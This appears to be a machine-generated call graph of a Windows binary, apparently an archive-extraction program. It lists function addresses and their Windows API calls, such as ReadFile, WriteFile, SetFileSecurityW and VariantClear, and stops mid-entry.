cca952 73683->73728 73767 cce0b0 6 API calls 73683->73767 73685 ccadeb 73787 ca1e40 free 73685->73787 73689 ccae99 73692 ca1e0c ctype 2 API calls 73689->73692 73690 ccac1e 73773 ca1e40 free 73690->73773 73691 ce04d2 malloc _CxxThrowException free _CxxThrowException memcpy 73695 ccadf3 73691->73695 73696 ccaea9 memset memset 73692->73696 73695->73689 73695->73691 73700 ccaedd 73696->73700 73697 ccac26 73774 ca1e40 free 73697->73774 73699->73683 73707 ce04d2 5 API calls 73699->73707 73766 cce0b0 6 API calls 73699->73766 73788 ca1e40 free 73700->73788 73704 ccaee5 73789 ca1e40 free 73704->73789 73706 ccaef0 73790 ca1e40 free 73706->73790 73707->73699 73711 ccc430 73792 ca1e40 free 73711->73792 73713 ccac6c 73775 ca1e40 free 73713->73775 73714 ccc438 73793 ca1e40 free 73714->73793 73716 ccac2e 73791 ca1e40 free 73716->73791 73718 ccc443 73794 ca1e40 free 73718->73794 73720 ccac85 73776 ca1e40 free 73720->73776 73723 ccc44e 73795 ca1e40 free 73723->73795 73725 ccc459 73727 ccad88 73783 cc8125 free ctype 73727->73783 73728->73682 73728->73690 73728->73713 73728->73727 73733 ccad17 73728->73733 73734 ccacbc 73728->73734 73748 cb101c 73728->73748 73751 cc98f2 73728->73751 73757 cccc6f 73728->73757 73768 cc9531 5 API calls __EH_prolog 73728->73768 73769 cc80c1 malloc _CxxThrowException __EH_prolog 73728->73769 73770 ccc820 5 API calls 2 library calls 73728->73770 73771 cc814d 6 API calls 73728->73771 73772 cc8125 free ctype 73728->73772 73732 ccad93 73784 ca1e40 free 73732->73784 73780 cc8125 free ctype 73733->73780 73777 cc8125 free ctype 73734->73777 73738 ccad3c 73781 ca1e40 free 73738->73781 73739 ccadac 73785 ca1e40 free 73739->73785 73740 ccacc7 73778 ca1e40 free 73740->73778 73744 ccace0 73779 ca1e40 free 73744->73779 73745 ccad55 73782 ca1e40 free 73745->73782 73796 cab95a 73748->73796 73752 cc98fc __EH_prolog 73751->73752 73812 cc9987 73752->73812 73754 cc9970 73754->73728 73756 cc9911 73756->73754 73816 ccef8d 12 API calls 2 library calls 73756->73816 73856 ce5505 73757->73856 73860 cef445 73757->73860 73866 cecf91 73757->73866 73758 cccc8b 73762 cccccb 73758->73762 73874 cc979e VariantClear __EH_prolog 73758->73874 73760 ccccb1 73760->73762 73875 cccae9 VariantClear 73760->73875 73762->73728 73766->73699 73767->73728 73768->73728 73769->73728 73770->73728 73771->73728 73772->73728 73773->73697 73774->73716 73775->73720 73776->73716 73777->73740 73778->73744 73779->73716 73780->73738 73781->73745 73782->73716 73783->73732 73784->73739 73785->73716 73786->73685 73787->73695 73788->73704 73789->73706 73790->73716 73791->73711 73792->73714 73793->73718 73794->73723 73795->73725 73797 cab969 73796->73797 73799 cab97d 73796->73799 73797->73799 73802 ca7731 73797->73802 73799->73728 73800 cab9ee 73800->73799 73810 cab8ec GetLastError 73800->73810 73803 ca775c SetFilePointer 73802->73803 73805 ca7740 73802->73805 73804 ca7780 GetLastError 73803->73804 73807 ca77a1 73803->73807 73806 ca778c 73804->73806 73804->73807 73805->73803 73811 ca76d6 SetFilePointer GetLastError 73806->73811 73807->73800 73809 ca7796 SetLastError 73809->73807 73810->73799 73811->73809 73813 cc9991 __EH_prolog 73812->73813 73817 cf80aa 73813->73817 73814 cc99a8 73814->73756 73816->73754 73818 cf80b4 __EH_prolog 73817->73818 73819 ca1e0c ctype 2 API calls 73818->73819 73820 cf80bf 73819->73820 73821 cf80d3 73820->73821 73823 cebdb5 73820->73823 73821->73814 73824 cebdbf __EH_prolog 73823->73824 73829 cebe69 73824->73829 73826 cebdef 73827 ca2e04 2 API calls 73826->73827 73828 cebe16 73827->73828 73828->73821 73830 cebe73 __EH_prolog 73829->73830 73833 ce5e2b 73830->73833 73832 cebe7f 73832->73826 73834 ce5e35 __EH_prolog 73833->73834 73839 ce08b6 73834->73839 73836 ce5e41 73844 cbdfc9 malloc _CxxThrowException __EH_prolog 73836->73844 73838 ce5e57 73838->73832 73845 ca9c60 73839->73845 73841 ce08c4 73850 ca9c8f GetModuleHandleA GetProcAddress 73841->73850 73843 ce08f3 __aulldiv 73843->73836 73844->73838 73855 ca9c4d GetCurrentProcess GetProcessAffinityMask 73845->73855 73847 ca9c6e 73848 ca9c80 GetSystemInfo 73847->73848 73849 ca9c79 73847->73849 73848->73841 73849->73841 73851 ca9cef GlobalMemoryStatus 73850->73851 73852 ca9cc4 GlobalMemoryStatusEx 73850->73852 73853 ca9d08 73851->73853 73852->73851 73854 ca9cce 73852->73854 73853->73854 73854->73843 73855->73847 73857 ce550f __EH_prolog 73856->73857 73876 ce4e8a 73857->73876 73861 cef455 73860->73861 74103 cb1092 73861->74103 73864 cef478 73864->73758 73867 cecf9b __EH_prolog 73866->73867 73868 cef445 14 API calls 73867->73868 73869 ced018 73868->73869 73871 ced01f 73869->73871 74155 cf1511 73869->74155 73871->73758 73872 ced08b 73872->73871 74161 cf2c5d 11 API calls 2 library calls 73872->74161 73874->73760 73875->73762 73877 ce4e94 __EH_prolog 73876->73877 73878 ca2e04 2 API calls 73877->73878 73925 ce4f1d 73877->73925 73879 ce4ed7 73878->73879 74008 cb7fc5 73879->74008 73881 ce4f0a 74029 ca965d 73881->74029 73882 ce4f37 73883 ce4f63 73882->73883 73884 ce4f41 73882->73884 73887 ca2f88 3 API calls 73883->73887 73886 ca965d VariantClear 73884->73886 73889 ce4f4c 73886->73889 73890 ce4f71 73887->73890 74034 ca1e40 free 73889->74034 73893 ca965d VariantClear 73890->73893 73894 ce4f80 73893->73894 74035 cb5bcf malloc _CxxThrowException 73894->74035 73896 ce4f9a 73897 ca2e47 2 API calls 73896->73897 73898 ce4fad 73897->73898 73899 ca2f1c 2 API calls 73898->73899 73900 ce4fbd 73899->73900 73901 ca2e04 2 API calls 73900->73901 73902 ce4fd1 73901->73902 73903 ca2e04 2 API calls 73902->73903 73905 ce4fdd 73903->73905 73904 ce5404 74080 ca1e40 free 73904->74080 73905->73904 74036 cb5bcf malloc _CxxThrowException 73905->74036 73907 ce540c 74081 ca1e40 free 73907->74081 73909 ce5414 74082 ca1e40 free 73909->74082 73912 ce5099 73914 ca2da9 2 API calls 73912->73914 73913 ce541c 74083 ca1e40 free 73913->74083 73916 ce50a9 73914->73916 73918 ca2fec 3 API calls 73916->73918 73917 ce5424 74084 ca1e40 free 73917->74084 73920 ce50b6 73918->73920 74037 ca1e40 free 73920->74037 73921 ce542c 74085 ca1e40 free 73921->74085 73924 ce50be 74038 ca1e40 free 73924->74038 73925->73758 73927 ce50cd 73928 ca2f88 3 API calls 73927->73928 73929 ce50e3 73928->73929 73930 ce5100 73929->73930 73931 ce50f1 73929->73931 74045 ca3044 malloc _CxxThrowException free ctype 73930->74045 74039 ca30ea 73931->74039 73934 ce50fe 74046 cb1029 6 API calls 73934->74046 73936 ce511a 73937 ce516b 73936->73937 73938 ce5120 73936->73938 74053 cb089e malloc _CxxThrowException free _CxxThrowException memcpy 73937->74053 74047 ca1e40 free 73938->74047 73941 ce5187 73945 ce04d2 5 API calls 73941->73945 73942 ce5128 74048 ca1e40 free 73942->74048 73944 ce5130 74049 ca1e40 free 73944->74049 73947 ce51ba 73945->73947 74054 ce0516 malloc _CxxThrowException ctype 73947->74054 73948 ce5138 74050 ca1e40 free 73948->74050 73951 ce51c5 73956 ce522d 73951->73956 73957 ce51f5 73951->73957 73952 ce5140 74051 ca1e40 free 73952->74051 73954 ce5148 74052 ca1e40 free 73954->74052 73958 ca2e04 2 API calls 73956->73958 74055 ca1e40 free 73957->74055 74005 ce5235 73958->74005 73960 ce51fd 74056 ca1e40 free 73960->74056 73963 ce5205 74057 ca1e40 free 73963->74057 73964 ce532e 74066 ca1e40 free 73964->74066 73967 ce520d 74058 ca1e40 free 73967->74058 73968 ce5347 73968->73904 73970 ce5358 73968->73970 74067 ca1e40 free 73970->74067 73973 ce53a3 74073 ca1e40 free 73973->74073 73983 ce53bc 74074 ca1e40 free 73983->74074 73988 ce53c4 73990 ce04d2 5 API calls 73990->74005 74005->73964 74005->73973 74005->73990 74006 ca2e04 2 API calls 74005->74006 74061 ce545c 5 API calls 2 library calls 74005->74061 74062 cb1029 6 API calls 74005->74062 74063 cb089e malloc _CxxThrowException free _CxxThrowException memcpy 74005->74063 74064 ce0516 malloc _CxxThrowException ctype 74005->74064 74065 ca1e40 free 74005->74065 74006->74005 74012 cb7fcf __EH_prolog 74008->74012 74009 cb7ff4 74010 cb800a 74009->74010 74086 ca950d 74009->74086 74095 ca9736 VariantClear 74010->74095 74011 cb8061 74014 cb805c 74011->74014 74026 cb8025 74011->74026 74012->74009 74012->74011 74012->74014 74015 cb8019 74012->74015 74094 ca9630 VariantClear 74014->74094 74015->74009 74018 cb801e 74015->74018 74017 cb80b8 74020 ca965d VariantClear 74017->74020 74021 cb8042 74018->74021 74022 cb8022 74018->74022 74025 cb80c0 74020->74025 74092 ca9597 VariantClear 74021->74092 74023 cb8032 74022->74023 74022->74026 74091 ca9604 VariantClear 74023->74091 74025->73881 74025->73882 74026->74010 74093 ca95df VariantClear 74026->74093 74030 ca9685 74029->74030 74032 ca9665 74029->74032 74033 ca1e40 free 74030->74033 74031 ca967e VariantClear 74031->74030 74032->74030 74032->74031 74033->73925 74034->73925 74035->73896 74036->73912 74037->73924 74038->73927 74040 ca30fd 74039->74040 74040->74040 74041 ca1e0c ctype 2 API calls 74040->74041 74044 ca311d 74040->74044 74042 ca3113 74041->74042 74102 ca1e40 free 74042->74102 74044->73934 74045->73934 74046->73936 74047->73942 74048->73944 74049->73948 74050->73952 74051->73954 74052->73925 74053->73941 74054->73951 74055->73960 74056->73963 74057->73967 74061->74005 74062->74005 74063->74005 74064->74005 74065->74005 74066->73968 74073->73983 74074->73988 74080->73907 74081->73909 74082->73913 74083->73917 74084->73921 74085->73925 74096 ca9767 74086->74096 74088 ca9518 SysAllocStringLen 74089 ca9539 _CxxThrowException 74088->74089 74090 ca954f 74088->74090 74089->74090 74090->74010 74091->74010 74092->74010 74093->74010 74094->74010 74095->74017 74097 ca9779 74096->74097 74098 ca9770 74096->74098 74101 ca9686 VariantClear 74097->74101 74098->74088 74100 ca9780 74100->74088 74101->74100 74102->74044 74105 cab95a 6 API calls 74103->74105 74104 cb10aa 74104->73864 74106 cef1b2 74104->74106 74105->74104 74107 cef1bc __EH_prolog 74106->74107 74116 cb1168 74107->74116 74109 cef1d3 74110 cef21c _CxxThrowException 74109->74110 74111 cef231 memcpy 74109->74111 74112 cef1e6 74109->74112 74110->74111 74114 cef24c 74111->74114 74112->73864 74113 cef2f0 memmove 74113->74114 74114->74112 74114->74113 74115 cef31a memcpy 74114->74115 74115->74112 74119 cb111c 74116->74119 74121 cb1130 74119->74121 74120 cb115f 74120->74109 74121->74120 74124 cad331 74121->74124 74128 cab668 74121->74128 74125 cad355 74124->74125 74126 cad374 74125->74126 74127 cab668 10 API calls 74125->74127 74126->74121 74127->74126 74136 cab675 74128->74136 74129 cab864 74147 ca7b7c 74129->74147 74132 cab8aa GetLastError 74133 cab6aa 74132->74133 74133->74121 74134 cab81b 74134->74133 74138 cab839 memcpy 74134->74138 74135 cab7e7 74135->74129 74141 ca7731 5 API calls 74135->74141 74136->74129 74136->74133 74136->74134 74136->74135 74137 ca7731 5 API calls 74136->74137 74139 cab7ad 74136->74139 74140 cab811 74136->74140 74152 ca7b4f ReadFile 74136->74152 74137->74136 74138->74133 74139->74136 74146 cab8c7 74139->74146 74151 d26a20 VirtualAlloc 74139->74151 74153 cab8ec GetLastError 74140->74153 74142 cab80d 74141->74142 74142->74129 74142->74140 74146->74133 74148 ca7b89 74147->74148 74154 ca7b4f ReadFile 74148->74154 74150 ca7b9a 74150->74132 74150->74133 74151->74139 74152->74136 74153->74133 74154->74150 74156 cf151b __EH_prolog 74155->74156 74162 cf10d3 74156->74162 74159 cf1589 74159->73872 74160 cf1552 _CxxThrowException 74160->73872 74160->74159 74161->73871 74163 cf10dd __EH_prolog 74162->74163 74194 ced1b7 74163->74194 74165 cf12ef 74165->74159 74165->74160 74166 cf11f4 74166->74165 74193 cab95a 6 API calls 74166->74193 74167 cf139e 74167->74165 74169 cf13c4 74167->74169 74172 ca1e0c ctype 2 API calls 74167->74172 74170 cb1168 10 API calls 74169->74170 74173 cf13da 74170->74173 74171 cb1168 10 API calls 74171->74166 74172->74169 74176 cf13f9 74173->74176 74186 cf13de 74173->74186 74236 ceef67 _CxxThrowException 74173->74236 74201 cef047 74176->74201 74179 cf14ba 74240 cf0943 50 API calls 2 library calls 74179->74240 74180 cf1450 74205 cf06ae 74180->74205 74184 cf14e7 74241 cd2db9 free ctype 74184->74241 74242 ca1e40 free 74186->74242 74193->74167 74243 ced23c 74194->74243 74196 ced1ed 74250 ca1e40 free 74196->74250 74198 ced209 74251 ca1e40 free 74198->74251 74200 ced21c 74200->74165 74200->74166 74200->74171 74202 cef063 74201->74202 74203 cef072 74202->74203 74279 ceef67 _CxxThrowException 74202->74279 74203->74179 74203->74180 74237 ceef67 _CxxThrowException 74203->74237 74206 cf06b8 __EH_prolog 74205->74206 74280 cf03f4 74206->74280 74211 cf08e3 _CxxThrowException 74214 cf08f7 74211->74214 74217 ceb8dc ctype free 74214->74217 74220 cf0914 74217->74220 74218 cf0715 74218->74211 74218->74214 74221 ca1e0c ctype 2 API calls 74218->74221 74234 cf0877 74218->74234 74235 ceef67 _CxxThrowException 74218->74235 74310 cb12a5 74218->74310 74315 ca429a 74218->74315 74321 ce81ec 74218->74321 74221->74218 74407 ceb8dc 74234->74407 74235->74218 74236->74176 74237->74180 74240->74184 74241->74186 74242->74165 74252 ced2b8 74243->74252 74246 ced25e 74269 ca1e40 free 74246->74269 74249 ced275 74249->74196 74250->74198 74251->74200 74271 ca1e40 free 74252->74271 74254 ced2c8 74272 ca1e40 free 74254->74272 74256 ced2dc 74273 ca1e40 free 74256->74273 74258 ced2e7 74274 ca1e40 free 74258->74274 74260 ced2f2 74275 ca1e40 free 74260->74275 74262 ced2fd 74276 ca1e40 free 74262->74276 74264 ced308 74277 ca1e40 free 74264->74277 74266 ced313 74268 ced246 74266->74268 74278 ca1e40 free 74266->74278 74268->74246 74270 ca1e40 free 74268->74270 74269->74249 74270->74246 74271->74254 74272->74256 74273->74258 74274->74260 74275->74262 74276->74264 74277->74266 74278->74268 74279->74203 74281 cef047 _CxxThrowException 74280->74281 74282 cf0407 74281->74282 74283 cef047 _CxxThrowException 74282->74283 74284 cf0475 74282->74284 74289 cf0421 74283->74289 74300 cf049a 74284->74300 74424 cefa3f 22 API calls 2 library calls 74284->74424 74285 cf04e8 74427 cf7c4a malloc _CxxThrowException free ctype 74285->74427 74287 cf04cd 74426 cefff0 9 API calls 2 library calls 74287->74426 74288 cf043e 74422 cef93c 7 API calls 2 library calls 74288->74422 74289->74288 74421 ceef67 _CxxThrowException 74289->74421 74291 cf0492 74294 cef047 _CxxThrowException 74291->74294 74294->74300 74296 cf04b8 74296->74285 74296->74287 74297 cf04db 74302 cef047 _CxxThrowException 74297->74302 74299 cf04e3 74304 cf054a 74299->74304 74429 ceef67 _CxxThrowException 74299->74429 74300->74296 74425 cf159a malloc _CxxThrowException free ctype 74300->74425 74301 cf0446 74303 cf046d 74301->74303 74423 ceef67 _CxxThrowException 74301->74423 74302->74299 74305 cef047 _CxxThrowException 74303->74305 74304->74218 74305->74284 74306 cf04f3 74306->74299 74428 cb089e malloc _CxxThrowException free _CxxThrowException memcpy 74306->74428 74311 ce04d2 5 API calls 74310->74311 74312 cb12ad 74311->74312 74316 ca42a7 74315->74316 74320 ca42c5 74315->74320 74317 ca42b3 74316->74317 74430 ca1e40 free 74316->74430 74317->74320 74320->74218 74322 ce81f6 __EH_prolog 74321->74322 74431 cef749 74322->74431 74408 ceb8e6 __EH_prolog 74407->74408 74421->74288 74422->74301 74423->74303 74424->74291 74425->74296 74426->74297 74427->74306 74428->74306 74429->74304 74430->74317 74518 ce0343 74523 ce035f 74518->74523 74521 ce0358 74524 ce0369 __EH_prolog 74523->74524 74540 cb139e 74524->74540 74529 ce0143 ctype free 74530 ce039a 74529->74530 74550 ca1e40 free 74530->74550 74532 ce03a2 74551 ca1e40 free 74532->74551 74534 ce03aa 74552 ce03d8 74534->74552 74539 ca1e40 free 74539->74521 74541 cb13ae 74540->74541 74542 cb13b3 74540->74542 74568 d37ea0 SetEvent GetLastError 74541->74568 74544 ce01c4 74542->74544 74548 ce01ce __EH_prolog 74544->74548 74545 ce0203 74569 ca1e40 free 74545->74569 74547 ce020b 74547->74529 74548->74545 74570 ca1e40 free 74548->74570 74550->74532 74551->74534 74553 ce03e2 __EH_prolog 74552->74553 74554 cb139e ctype 2 API calls 74553->74554 74555 ce03fb 74554->74555 74571 d37d50 74555->74571 74557 ce0403 74558 d37d50 ctype 2 API calls 74557->74558 74559 ce040b 74558->74559 74560 d37d50 ctype 2 API calls 74559->74560 74561 ce03b7 74560->74561 74562 ce004a 74561->74562 74563 ce0054 __EH_prolog 74562->74563 74577 ca1e40 free 74563->74577 74565 ce0067 74578 ca1e40 free 74565->74578 74567 ce006f 74567->74521 74567->74539 74568->74542 74569->74547 74570->74548 74572 d37d59 CloseHandle 74571->74572 74575 d37d7b 74571->74575 74573 d37d75 74572->74573 74574 d37d64 GetLastError 74572->74574 74573->74575 74574->74575 74576 d37d6e 74574->74576 74575->74557 74576->74557 74577->74565 74578->74567 74579 ccd3c2 74580 ccd3e9 74579->74580 74581 ca965d VariantClear 74580->74581 74582 ccd42a 74581->74582 74583 ccd883 2 API calls 74582->74583 74584 ccd4b1 74583->74584 74670 cc8d4a 74584->74670 74591 ca2fec 3 API calls 74592 ccd594 74591->74592 74593 ccd5cd 74592->74593 74594 ccd742 74592->74594 74596 ccd7d9 74593->74596 74695 cc9317 74593->74695 74722 cccd49 malloc _CxxThrowException free 74594->74722 74725 ca1e40 free 74596->74725 74597 ccd754 74600 ca2fec 3 API calls 74597->74600 74603 ccd763 74600->74603 74601 ccd7e1 74726 ca1e40 free 74601->74726 74723 ca1e40 free 74603->74723 74605 ccd5f1 74608 ce04d2 5 API calls 74605->74608 74607 ccd7e9 74610 cc326b free 74607->74610 74611 ccd5f9 74608->74611 74609 ccd76b 74724 ca1e40 free 74609->74724 74621 ccd69a 74610->74621 74701 cce332 74611->74701 74614 ccd773 74617 cc326b free 74614->74617 74617->74621 74618 ccd610 74708 ca1e40 free 74618->74708 74620 ccd618 74709 cc326b 74620->74709 74623 ccd2a8 74623->74621 74645 ccd883 74623->74645 74646 ccd88d __EH_prolog 74645->74646 74647 ca2e04 2 API calls 74646->74647 74648 ccd8c6 74647->74648 74649 ca2e04 2 API calls 74648->74649 74650 ccd8d2 74649->74650 74651 ca2e04 2 API calls 74650->74651 74652 ccd8de 74651->74652 74727 cc2b63 74652->74727 74671 cc8d54 __EH_prolog 74670->74671 74685 cc8da4 74671->74685 74735 ca2b55 malloc _CxxThrowException free _CxxThrowException ctype 74671->74735 74672 cc8e09 74675 ca965d VariantClear 74672->74675 74673 cc8e15 74674 cc8e2d 74673->74674 74676 cc8e5e 74673->74676 74677 cc8e21 74673->74677 74674->74676 74678 cc8e2b 74674->74678 74679 cc8e11 74675->74679 74681 ca965d VariantClear 74676->74681 74736 ca3097 malloc _CxxThrowException free SysStringLen ctype 74677->74736 74683 ca965d VariantClear 74678->74683 74687 cc8b05 74679->74687 74681->74679 74684 cc8e47 74683->74684 74684->74679 74737 cc8e7c 6 API calls __EH_prolog 74684->74737 74685->74672 74685->74673 74685->74679 74689 cc8b2e 74687->74689 74688 ca965d VariantClear 74690 cc8b5b 74688->74690 74689->74688 74691 cc2a72 74690->74691 74692 cc2a82 74691->74692 74693 ca2e04 2 API calls 74692->74693 74694 cc2a9f 74693->74694 74694->74591 74696 cc9321 __EH_prolog 74695->74696 74697 cc9360 74696->74697 74738 ca9686 VariantClear 74696->74738 74698 ca965d VariantClear 74697->74698 74699 cc93d0 74698->74699 74699->74596 74699->74605 74702 cce33c __EH_prolog 74701->74702 74703 ca1e0c ctype 2 API calls 74702->74703 74704 cce34a 74703->74704 74705 ccd608 74704->74705 74739 cce3d1 malloc _CxxThrowException __EH_prolog 74704->74739 74707 ca1e40 free 74705->74707 74707->74618 74708->74620 74710 cc3275 __EH_prolog 74709->74710 74740 cc2c0b 74710->74740 74713 cc2c0b ctype free 74714 cc3296 74713->74714 74745 ca1e40 free 74714->74745 74716 cc329e 74746 ca1e40 free 74716->74746 74718 cc32a6 74747 ca1e40 free 74718->74747 74720 cc32ae 74720->74623 74722->74597 74723->74609 74724->74614 74725->74601 74726->74607 74728 cc2b6d __EH_prolog 74727->74728 74729 ca2e04 2 API calls 74728->74729 74735->74685 74736->74678 74737->74679 74738->74697 74739->74705 74748 ca1e40 free 74740->74748 74742 cc2c16 74749 ca1e40 free 74742->74749 74744 cc2c1e 74744->74713 74745->74716 74746->74718 74747->74720 74748->74742 74749->74744 74750 cab144 74751 cab153 74750->74751 74753 cab159 74750->74753 74754 cb11b4 74751->74754 74755 cb11c1 74754->74755 74756 cb11eb 74755->74756 74759 ceae7c 74755->74759 74764 ceaf27 74755->74764 74756->74753 74760 ceae86 74759->74760 74771 cb7190 74760->74771 74784 cb7140 74760->74784 74761 ceaebb 74761->74755 74767 ceaf36 74764->74767 74765 ceb010 74765->74755 74766 ceaeeb 107 API calls 74766->74767 74767->74765 74767->74766 74869 cabd0c 74767->74869 74874 cead3a 74767->74874 74878 ceaebf 107 API calls 74767->74878 74772 cb719a __EH_prolog 74771->74772 74773 cb71b0 74772->74773 74777 cb71dd 74772->74777 74814 cb4d78 74773->74814 74776 cb71b7 74776->74761 74788 cb6fc5 74777->74788 74778 cb72b4 74779 cb72c0 74778->74779 74780 cb4d78 VariantClear 74778->74780 74779->74776 74781 cb7140 7 API calls 74779->74781 74780->74779 74781->74776 74782 cb72a3 SetFileSecurityW 74782->74778 74783 cb7236 74783->74776 74783->74778 74783->74782 74785 cb718d 74784->74785 74786 cb714b 74784->74786 74785->74761 74786->74785 74868 cb4dff 7 API calls 2 library calls 74786->74868 74789 cb6fcf __EH_prolog 74788->74789 74817 cb44a6 74789->74817 74791 cb706a 74820 cb68ac 74791->74820 74796 cb709e 74844 ca1e40 free 74796->74844 74797 cb7051 74797->74791 74802 cb11b4 107 API calls 74797->74802 74798 cb7029 74798->74791 74839 cb4dff 7 API calls 2 library calls 74798->74839 74801 cb70c0 74840 ca6096 15 API calls 2 library calls 74801->74840 74802->74791 74803 cb712e 74803->74783 74805 cb70d1 74808 cb70e2 74805->74808 74841 cb4dff 7 API calls 2 library calls 74805->74841 74811 cb70e6 74808->74811 74842 cb6b5e 69 API calls 2 library calls 74808->74842 74809 cb70fd 74810 cb7103 74809->74810 74809->74811 74843 ca1e40 free 74810->74843 74811->74796 74813 cb710b 74813->74803 74861 cc9262 74814->74861 74818 ca2e04 2 API calls 74817->74818 74819 cb44be 74818->74819 74819->74791 74819->74798 74838 cb6e71 12 API calls 2 library calls 74819->74838 74821 cb68b6 __EH_prolog 74820->74821 74823 cb6921 74821->74823 74835 cb68c5 74821->74835 74846 ca7d4b 74821->74846 74824 cb6962 74823->74824 74826 cb6998 74823->74826 74852 cb6a17 6 API calls 2 library calls 74823->74852 74824->74826 74853 ca2dcd malloc _CxxThrowException 74824->74853 74827 cb69e1 74826->74827 74845 ca7c3b SetFileTime 74826->74845 74856 cabcf8 CloseHandle 74827->74856 74832 cb697a 74854 cb6b09 13 API calls __EH_prolog 74832->74854 74835->74796 74835->74801 74836 cb698c 74855 ca1e40 free 74836->74855 74838->74798 74839->74797 74840->74805 74841->74808 74842->74809 74843->74813 74844->74803 74845->74827 74857 ca77c8 74846->74857 74848 ca7d76 74848->74823 74851 cb4dff 7 API calls 2 library calls 74848->74851 74851->74823 74852->74824 74853->74832 74854->74836 74855->74826 74856->74835 74858 ca7731 5 API calls 74857->74858 74859 ca77db 74858->74859 74859->74848 74860 ca7d3c SetEndOfFile 74859->74860 74860->74848 74862 cc926c __EH_prolog 74861->74862 74863 cc92a4 74862->74863 74864 cc92fc 74862->74864 74865 ca965d VariantClear 74863->74865 74866 ca965d VariantClear 74864->74866 74867 cb4d91 74865->74867 74866->74867 74867->74776 74868->74785 74879 ca7ca2 74869->74879 74872 cabd3d 74872->74767 74875 cead44 __EH_prolog 74874->74875 74887 cb6305 74875->74887 74876 ceadbf 74876->74767 74878->74767 74882 ca7caf 74879->74882 74881 ca7cdb 74881->74872 74883 cab8ec GetLastError 74881->74883 74882->74881 74884 ca7c68 74882->74884 74883->74872 74885 ca7c79 WriteFile 74884->74885 74886 ca7c76 74884->74886 74885->74882 74886->74885 74888 cb630f __EH_prolog 74887->74888 74924 cb62b9 74888->74924 74890 cb6427 74893 ca965d VariantClear 74890->74893 74892 cb644a 74894 ca965d VariantClear 74892->74894 74916 cb6445 74893->74916 74895 cb646b 74894->74895 74928 cb5126 74895->74928 74898 cc8b05 VariantClear 74899 cb648a 74898->74899 74900 cb4d78 VariantClear 74899->74900 74899->74916 74901 cb6499 74900->74901 74901->74916 74920 cb64ca 74901->74920 75080 cb5110 9 API calls 74901->75080 74903 cb65de 74904 cb669e 74903->74904 74905 cb65e7 74903->74905 74910 cb66b8 74904->74910 74911 cb6754 74904->74911 74904->74916 74908 ca1e0c ctype 2 API calls 74905->74908 74912 cb65f6 74905->74912 74906 cb64da 74906->74903 74906->74916 75082 cb789c free memmove ctype 74906->75082 74908->74912 74914 ca1e0c ctype 2 API calls 74910->74914 74970 cb5bea 74911->74970 75083 cc36ea 74912->75083 74913 cb666b 75096 ca1e40 free 74913->75096 74914->74916 74916->74876 74917 cb665c 75095 ca31e5 malloc _CxxThrowException free _CxxThrowException 74917->75095 74920->74906 74920->74916 75081 ca42e3 CharUpperW 74920->75081 74925 cb62c9 74924->74925 75097 cc8fa4 74925->75097 74929 cb5130 __EH_prolog 74928->74929 74930 cb51b4 74929->74930 74936 cb518e 74929->74936 75141 ca3097 malloc _CxxThrowException free SysStringLen ctype 74929->75141 74933 ca965d VariantClear 74930->74933 74930->74936 74932 ca965d VariantClear 74935 cb527f 74932->74935 74934 cb51bc 74933->74934 74934->74936 74937 cb5289 74934->74937 74938 cb5206 74934->74938 74935->74898 74935->74916 74936->74932 74937->74936 74939 cb5221 74937->74939 75142 ca3097 malloc _CxxThrowException free SysStringLen ctype 74938->75142 74941 ca965d VariantClear 74939->74941 74942 cb522d 74941->74942 74942->74935 74943 cb5351 74942->74943 75143 cb5459 malloc _CxxThrowException __EH_prolog 74942->75143 74943->74935 74950 cb53a1 74943->74950 75148 ca35e7 memmove 74943->75148 74946 cb52ba 75144 ca8011 5 API calls ctype 74946->75144 74948 cb52cf 74961 cb52fd 74948->74961 75145 ca823d 10 API calls 2 library calls 74948->75145 74950->74935 75149 ca43b7 5 API calls 2 library calls 74950->75149 74952 cb52e5 74954 ca2fec 3 API calls 74952->74954 74956 cb52f5 74954->74956 74955 cb540e 75151 cb789c free memmove ctype 74955->75151 75146 ca1e40 free 74956->75146 74960 cb53df 74960->74955 74962 cb541c 74960->74962 75150 ca42e3 CharUpperW 74960->75150 75147 cb54a0 free ctype 74961->75147 74963 cc36ea 5 API calls 74962->74963 74964 cb5427 74963->74964 74965 ca2fec 3 API calls 74964->74965 74966 cb5433 74965->74966 75152 ca1e40 free 74966->75152 74968 cb543b 75153 cd2db9 free ctype 74968->75153 74971 cb5bf4 __EH_prolog 74970->74971 75154 cb54c0 74971->75154 74974 cb5e17 74974->74916 74975 cc8b05 VariantClear 74976 cb5c34 74975->74976 74976->74974 75169 cb5630 74976->75169 74979 cc36ea 5 API calls 74980 cb5c51 74979->74980 74981 cb5c60 74980->74981 75269 cb57c1 53 API calls 2 library calls 74980->75269 74983 ca2f1c 2 API calls 74981->74983 74984 cb5c6c 74983->74984 74988 cb5caa 74984->74988 75270 cb6217 4 API calls 2 library calls 74984->75270 74986 cb5c91 74987 ca2fec 3 API calls 74986->74987 74989 cb5c9e 74987->74989 74990 cb5d49 74988->74990 74994 ca2e04 2 API calls 74988->74994 75271 ca1e40 free 74989->75271 74992 cb5d91 74990->74992 74993 cb5d55 74990->74993 74999 cb5da6 74992->74999 75190 cb58be 74992->75190 74995 ca2fec 3 API calls 74993->74995 74996 cb5cd2 74994->74996 74998 cb5d66 74995->74998 75272 ca1e40 free 74996->75272 75001 cb5d73 74998->75001 75277 ca5b2d 11 API calls 2 library calls 74998->75277 75000 ca2fec 3 API calls 74999->75000 75078 cb5d8c 74999->75078 75002 cb5dd1 75000->75002 75001->74999 75004 cb5d7b 75001->75004 75006 cb5de7 75002->75006 75017 cb5e41 75002->75017 75002->75078 75007 cb7140 7 API calls 75004->75007 75004->75078 75278 cb6b5e 69 API calls 2 library calls 75006->75278 75007->75078 75009 cb5cf5 75009->74990 75016 ca2fec 3 API calls 75009->75016 75010 cb5eb0 75015 ca1e0c ctype 2 API calls 75010->75015 75012 cb61fa 75293 ca1e40 free 75012->75293 75013 cb5e01 75018 cb5e20 75013->75018 75019 cb5e07 75013->75019 75027 cb5eb7 75015->75027 75020 cb5d0c 75016->75020 75017->75010 75281 cb4115 VariantClear _CxxThrowException __EH_prolog 75017->75281 75018->75078 75273 ca1089 malloc _CxxThrowException free _CxxThrowException 75020->75273 75024 cb5d16 75028 ca2f1c 2 API calls 75024->75028 75033 cb5e6e 75033->75010 75040 cb5ece 75033->75040 75041 cb5ea5 75033->75041 75033->75078 75292 ca1e40 free 75078->75292 75080->74920 75081->74920 75082->74903 75084 cc36f4 __EH_prolog 75083->75084 75085 ca2e04 2 API calls 75084->75085 75091 cc370a 75085->75091 75086 cc3736 75087 ca2f1c 2 API calls 75086->75087 75090 